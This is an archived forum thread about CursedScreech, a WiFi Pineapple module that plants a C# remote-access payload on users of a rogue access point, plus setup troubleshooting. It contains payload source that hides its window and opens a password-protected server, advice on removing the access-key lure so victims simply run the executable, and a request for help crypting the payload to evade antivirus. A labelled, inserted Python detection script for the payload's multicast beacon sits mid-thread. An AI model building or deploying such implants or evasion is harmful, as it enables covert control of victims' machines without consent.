[Official] CursedScreech


sud0nick

On 7/11/2018 at 6:11 PM, Ramez said:

I was finally able to find the solution! Apart from everything else I did above, you need to add the 'targetlogs' folder to the following directory: /pineapple/modules/CursedScreech/includes/forest

It looks like for some reason the new firmware updates have been causing issues where the 2 folders (keys & targetlogs) do not get created automatically. Anyway, hope this helps!

@Ramez thanks for finding this.  I just verified that the targetlogs directory doesn't get created as it should.  I'll work on a fix and push the update.  I'll also look into the keys directory in PortalAuth as I'm sure it's related to the same issue.

1 hour ago, sud0nick said:

@Ramez thanks for finding this.  I just verified that the targetlogs directory doesn't get created as it should.  I'll work on a fix and push the update.  I'll also look into the keys directory in PortalAuth as I'm sure it's related to the same issue.

I think that's my bad. I just realized that when we switched all modules from .tar.gz format to the git repository, empty directories would disappear.

They'll need to be created programmatically instead.

1 hour ago, Sebkinne said:

I think that's my bad. I just realized that when we switched all modules from .tar.gz format to the git repository, empty directories would disappear.

They'll need to be created programmatically instead.

Yeah, it's my fault for not checking for their existence in the first place.

I really appreciate the payload you have provided with the cursedscreech module, but I was just wondering, are there any other payloads out there that don't involve having to put it in an access key? In other words, the victim just has to download the executable file and run it, instead of having to do the whole generate access key thing. I've looked everywhere but can't seem to find any pre-configured payloads for the pineapple.

@Ramez when you generate the payload in Visual Studio just don't include the PA_Authorization class.  Here's an example:

using System;
using System.Drawing;
using System.Windows.Forms;
using PineappleModules;

namespace Payload
{
	public partial class Form1 : Form {
    
      	// ***************** REMOVE THIS LINE *****************
		PA_Authorization pauth = new PA_Authorization();
      	// ***************** REMOVE THIS LINE *****************
	
		public Form1() {
			InitializeComponent();
	
			CursedScreech cs = new CursedScreech();
			cs.startMulticaster("231.253.78.29", 19578);
			cs.setRemoteCertificateSerial("EF-BE-AD-DE");
			cs.setRemoteCertificateHash("1234567890ABCDEF");
			cs.startSecureServerThread("Payload.Payload.pfx", "#$My$ecuR3P4ssw*rd&");
		}
		private void Form1_FormClosing(object sender, FormClosingEventArgs e) {
			e.Cancel = true;
			this.Hide();
		}
      
      // ***************** REMOVE THIS FUNCTION *****************
      
		private void accessKeyButton_Click(object sender, EventArgs e) {
				
			// Request an access key from the Pineapple
			string key = pauth.getAccessKey();
	
			// Check if a key was returned
			string msg;
			if (key.Length > 0) {
				msg = "Your access key is unique to you so DO NOT give it away!\n\nAccess Key: " + key;
			}
			else {
				msg = "Failed to retrieve an access key from the server.  Please try again later.";
			}
			
			// Display message to the user
			MessageBox.Show(msg);
		}
      
      // ***************** REMOVE THIS FUNCTION *****************
	}
}

The authorization function is just a trick anyway.  There's no real dependency on the access key for Cursed Screech.  However, the Payloader injection set in Portal Auth does require the access key to allow a target through Evil Portal.  Maybe in the future I'll add a Payloader injection set that doesn't require the access key but for now you'll have to remove that functionality yourself.

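Added example (not part of the original thread or of the CursedScreech module): seen from the defended network, a payload built like the one above sends to a multicast group (231.253.78.29, port 19578 in the sample code), which stands out against the handful of groups a normal LAN uses. The sketch below flags repeated sends to multicast groups that are not on an allowlist; the flow-record format, the allowlist, the UDP transport and the sample records (including their 10-second spacing) are assumptions constructed for illustration.

```python
import ipaddress
from collections import defaultdict

# Assumption: multicast groups that are expected on this network.
ALLOWED_GROUPS = {
    ipaddress.ip_address("224.0.0.251"),      # mDNS
    ipaddress.ip_address("224.0.0.252"),      # LLMNR
    ipaddress.ip_address("239.255.255.250"),  # SSDP
}

# Constructed sample flow records: "epoch src dst dport proto"
SAMPLE_FLOWS = """\
1533800000 172.16.42.101 224.0.0.251 5353 udp
1533800005 172.16.42.117 231.253.78.29 19578 udp
1533800010 172.16.42.101 239.255.255.250 1900 udp
1533800015 172.16.42.117 231.253.78.29 19578 udp
1533800020 172.16.42.117 8.8.8.8 53 udp
1533800025 172.16.42.117 231.253.78.29 19578 udp
garbage line
"""

def find_unexpected_multicast(log_text, min_hits=2):
    """Return {(src, group, port): [timestamps]} for hosts that repeatedly
    send UDP to a multicast group that is not on the allowlist."""
    hits = defaultdict(list)
    for line in log_text.splitlines():
        parts = line.split()
        if len(parts) != 5 or parts[4].lower() != "udp":
            continue
        try:
            ts, port = int(parts[0]), int(parts[3])
            src = ipaddress.ip_address(parts[1])
            dst = ipaddress.ip_address(parts[2])
        except ValueError:
            continue  # skip malformed records
        if dst.is_multicast and dst not in ALLOWED_GROUPS:
            hits[(str(src), str(dst), port)].append(ts)
    return {k: v for k, v in hits.items() if len(v) >= min_hits}

def beacon_interval(timestamps):
    """Return the gap between sends if it is constant, else None."""
    gaps = {b - a for a, b in zip(timestamps, timestamps[1:])}
    return gaps.pop() if len(gaps) == 1 else None

if __name__ == "__main__":
    for key, ts in find_unexpected_multicast(SAMPLE_FLOWS).items():
        print(key, "hits:", len(ts), "interval:", beacon_interval(ts))
```

Because the group and port are set by whoever builds the payload, the allowlist approach is the durable part; matching on the sample values alone would miss any build that changes them.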

  • 2 weeks later...

First of all, thank you for the amazing support you have been giving. I do have a quick question. My target downloads and runs the payload fine, but although it shows up in the serverlog, Sein can't seem to make a connection. It never turns up in the target list in CursedScreech. Does anyone have any ideas why??

11 hours ago, display-names said:

First of all, thank you for the amazing support you have been giving. I do have a quick question. My target downloads and runs the payload fine, but although it shows up in the serverlog, Sein can't seem to make a connection. It never turns up in the target list in CursedScreech. Does anyone have any ideas why??

How is your target connected to the Pineapple?  There's an interface setting in the Settings pane that lets you select which interface Sein should listen on.  Make sure it's listening on the one that's connected to the same network as your target.

11 hours ago, sud0nick said:

How is your target connected to the Pineapple?  There's an interface setting in the Settings pane that lets you select which interface Sein should listen on.  Make sure it's listening on the one that's connected to the same network as your target.

Sein is listening on the br-lan interface, the target is connected through the open PineAP AP. Does that make sense?

16 hours ago, display-names said:

Sein is listening on the br-lan interface, the target is connected through the open PineAP AP. Does that make sense?

The PineAP interface is wlan1.  Not sure if you should see it on br-lan or not but try switching Sein to wlan1 and see if it works.

7 hours ago, sud0nick said:

The PineAP interface is wlan1.  Not sure if you should see it on br-lan or not but try switching Sein to wlan1 and see if it works.

Well, I only have the option to set it to br-lan. I do have the most up-to-date version though. I will just try to reinstall the module, I guess. But just in case, any ideas why I can't set my Sein interface to anything except br-lan?

 

EDIT 1: reinstall didn't help, too bad

Sein.png

Nevermind, wlan1 isn't available because by default it doesn't have an IP address.  The only interfaces that appear in that dropdown are those that have an IP.  br-lan should definitely be working.  I'll look into it.

On 8/9/2018 at 2:58 AM, sud0nick said:

Nevermind, wlan1 isn't available because by default it doesn't have an IP address.  The only interfaces that appear in that dropdown are those that have an IP.  br-lan should definitely be working.  I'll look into it.

Hey there, I have tried to get it to work, but no luck. Did you have any more luck? :)

  • 6 months later...
On 8/10/2018 at 3:41 PM, display-names said:

Hey there, I have tried to get it to work, but no luck. Did you have any more luck? :)

Hi there,

I had the same problem. 

I studied the code (PinappleModules.cs) and found out that in "startMulticaster", in the while loop, it set the "localIP" to the wrong interface. So I had to disable that interface in the adapter settings, after which it chose the right interface.

  • 2 months later...
On 5/6/2019 at 11:35 AM, fan said:

I'm looking for a way to crypt the payload that I build with visual studio to avoid detection
help me thanks

You want to encrypt the payload for transmission only or while it's on disk too?  If you encrypt it on disk to bypass AV you won't be able to execute it.  To run it you would need to decrypt it and at that point AV would get you anyway.  The point in providing an API for this module is to allow you to create your own payloads and work around AV however you choose.  You could possibly obfuscate your code but I don't think encryption is what you want.

Thanks for the answer, how can I use your payload to create another to bypass av. There is a video tutorial to learn how to do this.
Any information on this subject would be appreciated
 
  • 5 months later...

Already messaged Nick, but figured I would post a reply to this topic to see if anyone else might have some insight.

I have downloaded the module on a freshly fac-resetted pineapple that has had the firmware upgrade. I ran opkg update and got the depends installed.
Tried to get everything running after using papers to generate certs and created a C# payload, but Sein will not start. I checked the backend and it was yelling at me about ssl module for python, got pip, installed ssl, and still nothing.

Pretty confused at this point.

root@Pineapple:/pineapple/modules/CursedScreech/includes/forest# python sein.py &
root@Pineapple:/pineapple/modules/CursedScreech/includes/forest# Traceback (most recent call last):
  File "sein.py", line 56, in <module>
    sck.setsockopt(socket.IPPROTO_IP, socket.IP_ADD_MEMBERSHIP, socket.inet_aton(MCAST_GROUP)+socket.inet_aton(IFACE))
socket.error: illegal IP address string passed to inet_aton

Is what I am getting when I try to run it manually from the back end.

  • 2 weeks later...

Hi there,

When I try to start kuro, the following entries appear in the Activity log:
[+] Starting Kuro...
[>] Cleaning up sockets

Then it ends kuro and I cannot send any commands. In PortalAuth under payload the target is visible.
I'm afraid I don't know how to fix this at the moment. Can anyone help?

Thank you.

 

  • 1 month later...
  • 5 months later...
On 10/18/2019 at 11:00 PM, cr4nk said:

root@Pineapple:/pineapple/modules/CursedScreech/includes/forest# python sein.py &
root@Pineapple:/pineapple/modules/CursedScreech/includes/forest# Traceback (most recent call last):
  File "sein.py", line 56, in <module>
    sck.setsockopt(socket.IPPROTO_IP, socket.IP_ADD_MEMBERSHIP, socket.inet_aton(MCAST_GROUP)+socket.inet_aton(IFACE))
socket.error: illegal IP address string passed to inet_aton

Is what I am getting when I try to run it manually from the back end.

Exact same problem that I've gotten! Is there any solution for this?

  • 1 month later...

Hey everyone, I've decided that I'm not going to maintain this module any longer.  My reasons are similar to those I posted in the PortalAuth thread but also because the techniques used in this old module are no longer effective.  The payloads are caught pretty easily by AV now, even Windows Defender!  I think it's time for this module to ride off into the sunset.

As for the current issues people are facing with sein.py:

socket.error: illegal IP address string passed to inet_aton

This is probably because you haven't updated the interface setting from the module yet.  You should select an interface and click the save button which will update the settings.  You can also check /pineapple/modules/CursedScreech/includes/forest/settings to verify the correct IP address is set.  You may have my Pineapple's local IP in there (192.168.0.138) which is throwing the exception.

8 hours ago, JediMasterX said:

My Pineapple is just dead meat, seems like it's dead for a while now... seems like the product and most importantly the community is no longer there... wake up HAK5 😓

 

JMX

"Dead meat" is not a very diagnostic description.  What have you done to it? How did you attempt a reset?  Don't tell people to wake up if you can't really articulate what is going on.  Look at the reset process.  Follow it.  Make sure it is powered properly according to the documentation. Start following the process exactly.  Attempt to access it (and explain what happened), then if that doesn't work, follow the reset process.  Never expect people to care what you write when you didn't write anything descriptive yourself. That is important to any community.  

Archived

This topic is now archived and is closed to further replies.
